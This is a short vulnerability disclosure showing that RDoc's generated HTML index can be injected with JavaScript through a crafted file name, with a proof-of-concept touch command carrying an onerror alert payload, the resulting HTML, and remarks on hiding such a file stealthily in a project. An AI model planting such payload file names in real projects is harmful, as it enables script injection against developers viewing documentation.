When creating an RDoc html documentation, there is a possibility to inject malicious code through file name.

PoC

~ $ touch \"\>\<object\ src\=1\ onerror\=\"javascript\:alert\(1\)\;\"\>Controlling\ what\ is\ documented\ here
~ $ ls
"><object src=1 onerror="javascript:alert(1);">Controlling what is documented here
~ $ rdoc --all

Now, the generated index file has injected javascript code:

...
<li><a href="./">&lt;object src=1 onerror="javascript:alert(1);"&gt;Controlling what is documented here.html"&gt;&quot;&gt;&lt;object src=1 onerror=&quot;javascript:alert(1);&quot;&gt;Controlling what is documented here</a>
...

I set to the vulnerability the same severity as CVE-2013-0256 has, since rdoc is widely used on dev/production systems online documentation, etc. An attacker can hide a bad-named-file deep in the project structure to be stealthy. Also, the file can be very tricky-named in documentation list, can contain the real documentation code, and so as not to arouse suspicion for some time.

Impact

The injected code can exfiltrate data or install malware on the (user|developer)’s machine, etc.